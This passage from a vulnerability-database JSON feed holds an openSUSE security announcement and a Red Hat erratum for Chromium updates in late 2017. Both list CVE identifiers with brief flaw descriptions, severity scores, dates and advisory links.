bypass in Extensions.\n - CVE-2017-15392: Incorrect registry key handling in PlatformIntegration\n - CVE-2017-15393: Referrer leak in Devtools\n - CVE-2017-15394: URL spoofing in extensions UI\n - CVE-2017-15395: Null pointer dereference in ImageCapture\n - CVE-2017-15396: Stack overflow in V8\n - CVE-2017-15398: Stack buffer overflow in QUIC\n - CVE-2017-15399: Use after free in V8\n - CVE-2017-15408: Heap buffer overflow in PDFium\n - CVE-2017-15409: Out of bounds write in Skia\n - CVE-2017-15410: Use after free in PDFium\n - CVE-2017-15411: Use after free in PDFium\n - CVE-2017-15412: Use after free in libXML\n - CVE-2017-15413: Type confusion in WebAssembly\n - CVE-2017-15415: Pointer information disclosure in IPC call\n - CVE-2017-15416: Out of bounds read in Blink\n - CVE-2017-15417: Cross origin information disclosure in Skia\n - CVE-2017-15418: Use of uninitialized value in Skia\n - CVE-2017-15419: Cross origin leak of redirect URL in Blink\n - CVE-2017-15420: URL spoofing in Omnibox\n - CVE-2017-15422: Integer overflow in ICU\n - CVE-2017-15423: Issue with SPAKE implementation in BoringSSL\n - CVE-2017-15424: URL Spoof in Omnibox\n - CVE-2017-15425: URL Spoof in Omnibox\n - CVE-2017-15426: URL Spoof in Omnibox\n - CVE-2017-15427: Insufficient blocking of JavaScript in Omnibox\n\n The following tracked bug fixes are included:\n\n - sandbox crash fixes (bsc#1064298)\n\n", "edition": 1, "modified": "2017-12-08T12:15:59", "published": "2017-12-08T12:15:59", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00022.html", "id": "OPENSUSE-SU-2017:3245-1", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-08-13T18:45:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15386", "CVE-2017-15387", "CVE-2017-15388", "CVE-2017-15389", "CVE-2017-15390", "CVE-2017-15391", "CVE-2017-15392", "CVE-2017-15393", "CVE-2017-15394", "CVE-2017-15395", "CVE-2017-5124", "CVE-2017-5125", "CVE-2017-5126", "CVE-2017-5127", "CVE-2017-5128", "CVE-2017-5129", "CVE-2017-5130", "CVE-2017-5131", "CVE-2017-5132", "CVE-2017-5133"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 62.0.3202.62.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2017-5124, CVE-2017-5125, CVE-2017-5126, CVE-2017-5127, CVE-2017-5128, CVE-2017-5129, CVE-2017-5130, CVE-2017-5132, CVE-2017-5131, CVE-2017-5133, CVE-2017-15386, CVE-2017-15387, CVE-2017-15388, CVE-2017-15389, CVE-2017-15390, CVE-2017-15391, CVE-2017-15392, CVE-2017-15393, CVE-2017-15394, CVE-2017-15395)", "modified": "2018-06-07T18:21:43", "published": "2017-10-20T12:28:31", "id": "RHSA-2017:2997", "href": "https://access.redhat.com/errata/RHSA-2017:2997", "type": "redhat", "title": "(RHSA-2017:2997) Important: chromium-browser security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}